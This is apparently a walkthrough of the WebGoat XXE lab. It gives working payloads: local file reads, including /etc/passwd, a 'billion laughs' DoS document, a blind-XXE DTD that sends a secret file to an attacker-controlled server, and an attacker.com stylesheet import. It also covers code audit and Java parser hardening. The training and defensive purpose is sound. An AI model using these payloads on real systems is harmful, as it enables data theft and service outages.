WebGoat: XML External Entity (XXE) injection

01 XML entity injection

Concept
This lesson explains how to perform an XML external entity (XXE) attack, how it can be abused, and how to protect against it.

Goals
Users should have basic knowledge of XML.

Users will learn how XML parsers work.

Users will learn how to perform an XXE attack and how to protect against it.

02 XML entities?

XML entities allow defining tags that will be replaced by content when parsing an XML document. Generally speaking, entities are divided into three types:

internal entity

external entity

parameter entity

Entities must be declared in a document type definition (DTD). For example, a DTD can declare an internal entity js whose value is “Jo Smith”.

Once the XML document is processed by the parser, every reference to the entity js is replaced with the defined constant “Jo Smith”. The advantage is that the value only has to be changed in one place, for example to “John Smith”.
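
As a minimal sketch of this replacement, the following Java snippet parses the author document with the JDK's built-in DOM parser and reads back the expanded text. The class and method names (InternalEntityDemo, rootText, authorXml) are illustrative assumptions and are not part of WebGoat.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class InternalEntityDemo {
    // Builds the author document; the entity js is declared once in the DTD.
    static String authorXml(String name) {
        return "<?xml version=\"1.0\" standalone=\"yes\"?>"
             + "<!DOCTYPE author ["
             + "<!ELEMENT author (#PCDATA)>"
             + "<!ENTITY js \"" + name + "\">"
             + "]>"
             + "<author>&js;</author>";
    }

    // Parses the XML string and returns the text of the root element.
    static String rootText(String xml) {
        try {
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement().getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException("parsing failed", e);
        }
    }

    public static void main(String[] args) {
        // Only the entity declaration changes; the reference &js; stays the same.
        System.out.println(rootText(authorXml("Jo Smith")));
        System.out.println(rootText(authorXml("John Smith")));
    }
}
```

Changing the argument passed to authorXml changes every place where &js; is referenced, which is the convenience the paragraph above describes.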

In Java applications, XML can be used to send data from the client to the server. Most of us are familiar with JSON APIs, but XML can carry the same information. Most of the time the framework automatically populates Java objects based on the XML structure.
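
To make the idea of populating Java objects concrete, here is a hand-written sketch that maps a comment document to a Java object using the JDK's DOM API. Real frameworks do this through reflection or annotations; the Comment class, the fromXml helper and the element names are assumptions chosen for illustration only. The parser is deliberately left at its defaults, which is exactly the situation the following sections examine.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class CommentBinding {
    // Hypothetical target type that the XML is mapped onto.
    static final class Comment {
        final String text;

        Comment(String text) {
            this.text = text;
        }
    }

    // Reads the first <text> element and copies its content into a Comment.
    static Comment fromXml(String xml) {
        try {
            Document doc = DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xml)));
            String text = doc.getElementsByTagName("text").item(0).getTextContent();
            return new Comment(text);
        } catch (Exception e) {
            throw new IllegalArgumentException("not a valid comment document", e);
        }
    }

    public static void main(String[] args) {
        Comment c = fromXml("<comment><text>This is my first message</text></comment>");
        System.out.println(c.text);
    }
}
```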

What is XXE injection?

An XML external entity attack is an attack against applications that parse XML input. This attack occurs when XML input containing references to external entities is processed by a weakly configured XML parser. This attack can lead to confidential data disclosure, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is hosted, and other system impacts.

Attacks may include using file: schemes or relative paths in system identifiers to exfiltrate local files, which may contain sensitive data such as passwords or private user data. Because the attack occurs relative to the application that processes the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly exfiltrating other internal content via http(s) requests or launching a CSRF attack against unprotected internal services. In some cases, an XML processor library that is vulnerable to a client-side memory corruption issue could be exploited by dereferencing a malicious URI, potentially allowing arbitrary code execution under the application account. Other attacks can access local resources that may not stop returning data, potentially impacting application availability if too many threads or processes are not freed.

Generally speaking, we can distinguish the following types of XXE attacks:

Classic: In this case, the external entity is contained in the local DTD

Blind: No output and/or errors are shown in the response

Error: Trying to get the resource content in the error message

03 XXE example

XXE Example

Let’s look at an example of XXE injection. In the previous section we saw that XML entities can be used as follows:

<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
  <!ELEMENT author (#PCDATA)>
  <!ENTITY js "Jo Smith">
]>
<author>&js;</author>

External DTD declaration

These entities can also be declared in a separate DTD file that the document imports, for example:

<?xml version="1.0"?>
<!DOCTYPE email SYSTEM "email.dtd">
<email>
  <to>[email protected]</to>
  <from>[email protected]</from>
  <subject>Your app is great, but contains flaws</subject>
  <body>Hi, your application contains some SQL injections</body>
</email>

The file email.dtd can be defined as follows:

<!ELEMENT email (to,from,subject,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT subject (#PCDATA)>
<!ELEMENT body (#PCDATA)>

XXE

If the XML parser is configured to allow external DTDs or entities, we can change the XML fragment to the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE author [
  <!ENTITY js SYSTEM "file:///etc/passwd">
]>
<author>&js;</author>

What happens now? We define an entity that includes a file from the local file system; the XML parser loads the file and inserts its content wherever the entity is referenced. If the parsed XML is returned to the user, the response will contain the contents of /etc/passwd.

An external document type definition (DOCTYPE) is something you can always add to an XML document, and if any parser settings allow processing of external entities, you have a good starting point for finding an XXE injection.
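
The effect can be reproduced locally without touching /etc/passwd. The sketch below writes a temporary file, points an external entity at it, and parses the document with an unconfigured DocumentBuilderFactory. Names such as ExternalEntityDemo and payloadFor are hypothetical, and whether the file content actually appears depends on the JDK version and its JAXP configuration.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

class ExternalEntityDemo {
    // Builds a document whose entity js points at the given file.
    static String payloadFor(Path file) {
        return "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
             + "<!DOCTYPE author [<!ENTITY js SYSTEM \"" + file.toUri() + "\">]>"
             + "<author>&js;</author>";
    }

    // Parses with an unconfigured factory, as a careless application might.
    static String parseWithDefaults(String xml) {
        try {
            return DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xml)))
                    .getDocumentElement()
                    .getTextContent();
        } catch (Exception e) {
            return "parsing failed: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // A harmless stand-in for a sensitive file.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "top-secret".getBytes(StandardCharsets.UTF_8));
        try {
            System.out.println(parseWithDefaults(payloadFor(secret)));
        } finally {
            Files.delete(secret);
        }
    }
}
```

If the printed text is the content of the temporary file, the parser resolved the external entity, which is the behaviour an attacker relies on.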

04

Goal: List the files in the root directory of the file system.

The page provides a form for posting comments. Open Burp Suite, launch its built-in browser, open the page, and post a comment.

The request that submits the comment carries its payload as XML, and the content of the text element is displayed directly in the comment area.

In Burp Suite, right-click the request and send it to Repeater. Change the body to the injected XML below and send the request again; the lesson is then marked as completed.

<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>


The comment area now lists the files under that path, which shows that the injection succeeded. (On Windows, the directory listing is output as well.)

With the XML below, the contents of the /etc/passwd file are displayed in the comment area. This works when WebGoat is deployed on Linux.

<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///etc/passwd"> ]><comment><text>&root;</text></comment>

06 Find XXE through code audit

Now that we know how injection works, let’s look at why this happens. In Java applications, XML library configuration is not safe by default and you must change the settings. Suppose you discover the following code snippet during a code review:

public XmlMapper xmlMapper() {
  return new XmlMapper(XMLInputFactory.newInstance());
}

When looking at the release notes for the Jackson library, you will read:
Disable SUPPORT_DTD unless XMLInputFactory is explicitly overridden
– Jackson 2.7.8 (September 26, 2016)

Question: Is the parser vulnerable?

This code defines a new XmlMapper (an ObjectMapper), which belongs to a popular framework for reading and writing XML and JSON. Tracing the code one level deeper into the XmlMapper source, we find:

1 This is the constructor we called in the listing above.
2 It calls another constructor and initializes a new instance of XmlFactory.

Next, look at the source code of XmlFactory:

1 This is the constructor definition for the new instance created in 3.
2 It calls another constructor, defined in 3.
4 Here we see the check if (xmlIn == null). It is not true in our case, because the declaration at the top passes our own instance, XMLInputFactory.newInstance(), which is not null. This means we have an XML parser that is not protected against XXE injection by default. The interesting part at 5 and 6 is that the extra protection is nested inside this if statement, so it is skipped.

Compare this with how the Spring Boot framework initializes the same parser:

1 It calls a method that initializes the parser safely.

As you can see, the XMLInputFactory is explicitly defined via the private method xmlInputFactory(), which sets the same properties for the parser as we saw in the previous listing.

As you can see, it is not that easy to find out whether a parser is safe against injection; you really have to dig into the code and libraries to find out which settings the parser uses.
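
One practical way to check what a given factory will do is to ask it directly. The following sketch prints the two StAX properties most relevant to XXE for the factory returned by XMLInputFactory.newInstance(), before and after hardening. The class name StaxSettingsAudit is an assumption, and the default values printed depend on which StAX implementation is on the classpath.

```java
import javax.xml.stream.XMLInputFactory;

class StaxSettingsAudit {
    // Returns a one-line summary of the two settings that matter most for XXE.
    static String describe(XMLInputFactory factory) {
        return "supportDTD=" + factory.getProperty(XMLInputFactory.SUPPORT_DTD)
             + ", externalEntities="
             + factory.getProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES);
    }

    public static void main(String[] args) {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        System.out.println("defaults: " + describe(factory));

        // The same two switches that Jackson's release note refers to.
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        System.out.println("hardened: " + describe(factory));
    }
}
```

Running a check like this during a code review removes the guesswork about what a library does with a factory that is passed in from outside.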

See the OWASP XXE Prevention Cheat Sheet for more ways to protect your parser: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html

07 Modern REST framework

In modern REST frameworks the server might accept data formats that you as a developer did not think about. As a result, even endpoints that normally receive JSON may also accept XML and be vulnerable to XXE attacks.

This is the same exercise again: try to perform the same XML injection as in the first assignment.

The request body of this endpoint is in JSON format, but what happens if it is changed to XML?
In Burp Suite, change the header to Content-Type: application/xml

and change the body to

<comment><text>This is my first message</text></comment>

The request succeeds.

Next, construct the injected XML:

<!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;This is my first message</text></comment>


As you can see, the comments also display the files in the root directory, indicating that the XML injection was successful.

View source code

When the Content-Type is application/json, the check fails immediately. When it is application/xml, the body is parsed as XML and the code checks whether comment.getText() contains system files of the corresponding operating system. If the XXE succeeded, the returned directory listing contains those file names and the assignment passes.

Summary: REST-style frameworks may also accept data submitted as XML, which makes XXE attacks possible.

09 XXE DoS attack

With the same XXE technique we can perform a denial-of-service (DoS) attack against the server. An example of such an attack is:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

When an XML parser loads this document, it sees that it includes one root element, “lolz”, that contains the text “&lol9;”. However, “&lol9;” is a defined entity that expands to a string containing ten “&lol8;” strings. Each “&lol8;” string is a defined entity that expands to ten “&lol7;” strings, and so on. After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually take up almost 3 gigabytes of memory.

This is called the “billion laughs” attack; more information can be found here: https://en.wikipedia.org/wiki/Billion_laughs
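
The memory figure follows from simple arithmetic: nine levels of tenfold nesting yield 10^9 copies of the three-character string "lol". A small sketch of that calculation, with illustrative names and assuming one byte per character:

```java
class BillionLaughsSize {
    // Number of copies of the innermost entity after `levels` rounds of `fanOut`-fold nesting.
    static long copies(int levels, int fanOut) {
        long n = 1;
        for (int i = 0; i < levels; i++) {
            n = Math.multiplyExact(n, (long) fanOut); // fails loudly on overflow
        }
        return n;
    }

    // Size of the fully expanded text, assuming one byte per character.
    static long expandedBytes(int levels, int fanOut, String innermost) {
        return Math.multiplyExact(copies(levels, fanOut), (long) innermost.length());
    }

    public static void main(String[] args) {
        System.out.println(copies(9, 10));               // 1000000000
        System.out.println(expandedBytes(9, 10, "lol")); // 3000000000
    }
}
```

Three billion bytes is roughly 2.8 GiB, which matches the "almost 3 gigabytes" quoted above; an in-memory representation that uses more than one byte per character would need even more.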

10 Blind XXE

In some cases you won’t see any output: although your attack may work, the field is not reflected in the page’s output, or the resource you are trying to read contains illegal XML characters, which causes the parser to fail. Let’s start with an example. In this case we reference an external DTD, which we control on our own server.

As the attacker you control WebWolf (this can be any server under your control). For example, you can ping this server by requesting http://10.100.33.188:9090/home

How can we use this endpoint to verify that we can perform XXE?

We can again use WebWolf to host a file called attack.dtd with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'http://10.100.33.188:9090/landing'>

Now submit the form and change the xml to:

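<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "(URL of attack.dtd on WebWolf)">
%remote;
]>
<comment>
  <text>test&ping;</text>
</comment>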

Now browse to “Incoming Requests” in WebWolf and you will see:

{
  "method" : "GET",
  "path" : "/landing",
  "headers" : {
    "request" : {
      "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    }
  },
  "parameters" : {
    "test" : [ "HelloWorld" ]
  },
  "timeTaken" : "1"
}

Therefore, using XXE, we are able to ping our own server, which means XXE injection is possible. With XXE injection we can achieve the same effect as the manual request we started with.

Blind XXE assignment

https://zhuanlan.zhihu.com/p/69056318

The assignment requires sending the contents of a secret file on the WebGoat server to WebWolf. The DTD can be uploaded through WebWolf.
Source code:

  @PostMapping(path = "xxe/blind", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
  @ResponseBody
  public AttackResult addComment(@RequestBody String commentStr) {
    var fileContentsForUser = userToFileContents.getOrDefault(getWebSession().getUser(), "");

    // Solution is posted by the user as a separate comment
    if (commentStr.contains(fileContentsForUser)) {
      return success(this).build();
    }

    try {
      Comment comment = comments.parseXml(commentStr);
      if (fileContentsForUser.contains(comment.getText())) {
        comment.setText("Nice try, you need to send the file to WebWolf");
      }
      comments.addComment(comment, false);
    } catch (Exception e) {
      return failed(this).output(e.toString()).build();
    }
    return failed(this).build();
  }

This is the source code of the Windows version, and it has a problem: the check only passes when the file content itself is submitted directly as commentStr, because commentStr is compared with the file content before any parsing happens.
That is clearly wrong; the comment should be parsed first.
So I first modified the source code so that a parsed comment whose text contains the file content counts as success.

If you take the shortcut of referencing the file address directly in the XML, it then passes, because the entity loads the file and the parsed text matches the file content.

What the assignment intends:

Write the DTD file a.dtd, upload it to WebWolf, and note the URL of the uploaded file.

<!ENTITY % file SYSTEM "file:///C:/Users/Administrator/.webgoat-2023.5-SNAPSHOT/XXE/yangyali/secret.txt">
<!ENTITY % a "<!ENTITY attack SYSTEM 'http://127.0.0.1:9090/landing?text=%file;'>">
%a;

Then send the following XML to the xxe/blind endpoint to complete the assignment.

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % remote SYSTEM "http://127.0.0.1:9090/files/yangyali/f.dtd">
%remote;
]>
<comment><text>&attack;</text></comment>

The principle is that the external DTD file uses the parameter entity file to obtain the file content and then uses the attack entity to carry that content in the text parameter, so that the parsed comment text is derived from the file content.

The pitfall of this assignment is that the source code is wrong, and being unfamiliar with XML makes it even harder to solve.

12 How to protect against XML injection?

Set XML parser to disable DTD

To prevent XXE attacks, you need to ensure that input received from untrusted clients is validated. In the Java world, you can also instruct the parser to ignore the DTD entirely, for example:

XMLInputFactory xif = XMLInputFactory.newFactory();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);

Set XML parser to disable external entities

If DTD support cannot be turned off completely, you can also instruct the XML parser to ignore external entities, for example:

XMLInputFactory xif = XMLInputFactory.newFactory();
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);

For configuration details, see the OWASP XXE Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
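
The same idea applies to DOM parsers. As a sketch, assuming the JDK's built-in Xerces-derived parser (which recognizes the disallow-doctype-decl feature recommended by the OWASP cheat sheet), a factory can be configured to reject any document that carries a DOCTYPE. HardenedDomParser and its methods are illustrative names.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

class HardenedDomParser {
    // Creates a builder that refuses DOCTYPE declarations altogether.
    static DocumentBuilder hardenedBuilder() {
        try {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            dbf.setXIncludeAware(false);
            dbf.setExpandEntityReferences(false);
            return dbf.newDocumentBuilder();
        } catch (ParserConfigurationException e) {
            throw new IllegalStateException("parser does not support the hardening feature", e);
        }
    }

    // Returns true when the hardened parser rejects the document.
    static boolean rejects(String xml) {
        try {
            hardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException | IOException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        String xxe = "<?xml version=\"1.0\"?>"
                   + "<!DOCTYPE author [<!ENTITY js SYSTEM \"file:///etc/passwd\">]>"
                   + "<author>&js;</author>";
        System.out.println("XXE payload rejected: " + rejects(xxe));
        System.out.println("plain comment rejected: "
                + rejects("<comment><text>hello</text></comment>"));
    }
}
```

Rejecting the DOCTYPE is the strictest option; it also blocks documents that legitimately use a DTD, so it only fits applications that never need one.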

Verify the content-type and accept in the http header

Implement proper validation for the Content-Type and Accept headers, and don’t simply rely on the framework to handle incoming requests. If the client does not specify an acceptable Accept header, return “406/Not Acceptable”. If the endpoint expects a JSON body, bodies in other formats should not be accepted.
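
A minimal, framework-independent sketch of such a check is shown below. It assumes an endpoint that only speaks JSON; the class name, the method names and the choice of 415 (Unsupported Media Type) for a wrong Content-Type are assumptions for illustration, while 406 for an unacceptable Accept header follows the text above. Quality values such as q=0 are ignored for brevity.

```java
import java.util.Locale;

class ContentTypeGuard {
    // True only when the media type (ignoring parameters such as charset) is application/json.
    static boolean isJson(String contentTypeHeader) {
        if (contentTypeHeader == null) {
            return false;
        }
        String mediaType = contentTypeHeader.split(";", 2)[0].trim().toLowerCase(Locale.ROOT);
        return mediaType.equals("application/json");
    }

    // True when the client can accept a JSON response; a missing header means no preference.
    static boolean acceptsJson(String acceptHeader) {
        if (acceptHeader == null || acceptHeader.trim().isEmpty()) {
            return true;
        }
        for (String range : acceptHeader.split(",")) {
            String type = range.split(";", 2)[0].trim().toLowerCase(Locale.ROOT);
            if (type.equals("application/json") || type.equals("application/*") || type.equals("*/*")) {
                return true;
            }
        }
        return false;
    }

    // Maps both checks to an HTTP status code.
    static int statusFor(String contentTypeHeader, String acceptHeader) {
        if (!isJson(contentTypeHeader)) {
            return 415; // body is not JSON, so it is never handed to an XML parser
        }
        if (!acceptsJson(acceptHeader)) {
            return 406;
        }
        return 200;
    }

    public static void main(String[] args) {
        System.out.println(statusFor("application/json; charset=UTF-8", "application/json")); // 200
        System.out.println(statusFor("application/xml", "*/*"));                              // 415
        System.out.println(statusFor("application/json", "application/xml"));                 // 406
    }
}
```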

Filter in submitted data

13 Find XXE issues through static code analysis

Static code analysis can help identify vulnerabilities in your code. A well-known static code analysis tool is SonarQube. When you run a code scan on WebGoat’s source code, you’ll get results like this:

Sonar OWASP issues
If you select the XXE category, it will show the location of XXE vulnerabilities.

The following is the result of my scan

XXE issue in Comments class
The next step is to determine whether this is a real problem or a false positive. As you already know from the challenge exercise, this is a real problem. In this case, it was put in intentionally.

SonarQube also shows what you can do to resolve the issue: set the two given properties to an empty string.

After setting these properties and sending the request from assignment 4 again, a message appears saying that the external document cannot be read.

XXE suggested fix
If you click the button below you can try the XXE challenge again and you will notice that the vulnerability has been mitigated.

Reference: https://blog.csdn.net/hee_mee/article/details/106751066

XML rules in sonar

XML parsing should avoid XXE vulnerabilities
XML allows the use of internal or external entities (via the file system or network), which may lead to information disclosure or SSRF.

The following XML defines an external entity that reads the /etc/passwd file:

<?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <to>&xxe;</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:import href="http://www.attacker.com/evil.xsl"/>
  <xsl:include href="http://www.attacker.com/evil.xsl"/>
 <xsl:template match="/">
   &content;
 </xsl:template>
</xsl:stylesheet>

It is recommended to disable access to external entities and network access in general.

To protect Java XML Parsers from XXE attacks these properties have been defined since JAXP 1.5:
ACCESS_EXTERNAL_DTD: should be set to "" when processing XML/XSD/XSL files (it looks for external DOCTYPEs)
ACCESS_EXTERNAL_SCHEMA: should be set to "" when processing XML/XSD/XSL files (it looks for external schemaLocation, etc.)
ACCESS_EXTERNAL_STYLESHEET: should be set to "" when processing XSL files (it looks for external imports, includes, etc.)

Note that Apache Xerces is still based on JAXP 1.4, so one solution is to set the external-general-entities feature to false.
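
As a sketch of that workaround, the snippet below turns off external general and parameter entities on a SAXParserFactory through the standard SAX feature URIs. It assumes a Xerces-based parser such as the one bundled with the JDK; the class and method names are illustrative.

```java
import javax.xml.parsers.SAXParserFactory;

class XercesEntityFeatures {
    static final String GENERAL = "http://xml.org/sax/features/external-general-entities";
    static final String PARAMETER = "http://xml.org/sax/features/external-parameter-entities";

    // Returns a factory whose parsers will not fetch external entities.
    static SAXParserFactory withoutExternalEntities() {
        try {
            SAXParserFactory factory = SAXParserFactory.newInstance();
            factory.setFeature(GENERAL, false);
            factory.setFeature(PARAMETER, false);
            return factory;
        } catch (Exception e) {
            throw new IllegalStateException("parser does not support these features", e);
        }
    }

    // Reads a feature back so the setting can be verified in a test or at startup.
    static boolean isEnabled(SAXParserFactory factory, String feature) {
        try {
            return factory.getFeature(feature);
        } catch (Exception e) {
            throw new IllegalStateException("cannot read feature " + feature, e);
        }
    }

    public static void main(String[] args) {
        SAXParserFactory factory = withoutExternalEntities();
        System.out.println("general entities enabled: " + isEnabled(factory, GENERAL));
        System.out.println("parameter entities enabled: " + isEnabled(factory, PARAMETER));
    }
}
```

Disabling parameter entities as well closes the route used by the blind XXE technique, which loads its payload through a parameter entity.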

Avoid relying on the FEATURE_SECURE_PROCESSING feature to protect against XXE attacks because, depending on the implementation:

it has no effect on XXE protection and only helps guard against excessive memory consumption from XML processing,
or it is just an obscure shortcut (it could set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to "" but without guarantee).

When an entity resolver is set to null (e.g. setEntityResolver(null)), the parser uses its own resolution, which is unsafe.

Noncompliant code examples

DocumentBuilderFactory library:

String xml = "xxe.xml";
DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = df.newDocumentBuilder(); // Noncompliant
Document document = builder.parse(new InputSource(xml));
DOMSource domSource = new DOMSource(document);

SAXParserFactory library:

String xml = "xxe.xml";
SaxHandler handler = new SaxHandler();
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser parser = factory.newSAXParser(); // Noncompliant
parser.parse(xml, handler);

XMLInputFactory library:

XMLInputFactory factory = XMLInputFactory.newInstance(); // Noncompliant
XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));

TransformerFactory library:

String xslt = "xxe.xsl";
String xml = "xxe.xml";
TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance(); // Noncompliant
Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));

StringWriter writer = new StringWriter();
transformer.transform(new StreamSource(xml), new StreamResult(writer));
String result = writer.toString();

SchemaFactory library:

String xsd = "xxe.xsd";
StreamSource xsdStreamSource = new StreamSource(xsd);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI); // Noncompliant
Schema schema = schemaFactory.newSchema(xsdStreamSource);

Validator library:

String xsd = "xxe.xsd";
String xml = "xxe.xml";
StreamSource xsdStreamSource = new StreamSource(xsd);
StreamSource xmlStreamSource = new StreamSource(xml);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = schemaFactory.newSchema(xsdStreamSource);
Validator validator = schema.newValidator(); // Noncompliant

StringWriter writer = new StringWriter();
validator.validate(xmlStreamSource, new StreamResult(writer));

Dom4j library:

SAXReader xmlReader = new SAXReader(); // Noncompliant by default
Document xmlResponse = xmlReader.read(xml);

Jdom2 library:

SAXBuilder builder = new SAXBuilder(); // Noncompliant by default
Document document = builder.build(new File(xml));

Compliant solutions

DocumentBuilderFactory library:

String xml = "xxe.xml";
DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
DocumentBuilder builder = df.newDocumentBuilder();
Document document = builder.parse(new InputSource(xml));
DOMSource domSource = new DOMSource(document);

SAXParserFactory library:

String xml = "xxe.xml";
SaxHandler handler = new SaxHandler();
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser parser = factory.newSAXParser();
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
parser.parse(xml, handler);

XMLInputFactory library:

XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant

XMLEventReader eventReader = factory.createXMLEventReader(new FileReader("xxe.xml"));

TransformerFactory library:

String xslt = "xxe.xsl";
String xml = "xxe.xml";
TransformerFactory transformerFactory = javax.xml.transform.TransformerFactory.newInstance();
transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); // Compliant
// ACCESS_EXTERNAL_SCHEMA not supported in several TransformerFactory implementations
Transformer transformer = transformerFactory.newTransformer(new StreamSource(xslt));

StringWriter writer = new StringWriter();
transformer.transform(new StreamSource(xml), new StreamResult(writer));
String result = writer.toString();

SchemaFactory library:

String xsd = "xxe.xsd";
StreamSource xsdStreamSource = new StreamSource(xsd);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
Schema schema = schemaFactory.newSchema(xsdStreamSource);

Validator library:

String xsd = "xxe.xsd";
String xml = "xxe.xml";
StreamSource xsdStreamSource = new StreamSource(xsd);
StreamSource xmlStreamSource = new StreamSource(xml);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
// Set the restrictions before the schema is created so that they apply to it
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
schemaFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
Schema schema = schemaFactory.newSchema(xsdStreamSource);
// validators created from this schema also inherit these properties
Validator validator = schema.newValidator();

validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // Compliant

StringWriter writer = new StringWriter();
validator.validate(xmlStreamSource, new StreamResult(writer));

Dom4j library:

For the dom4j library, ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA are not supported, so a very strict fix is to disable DOCTYPE declarations:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // Compliant
Document xmlResponse = xmlReader.read(xml);

Jdom2 library:

SAXBuilder builder = new SAXBuilder(); // Compliant
builder.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
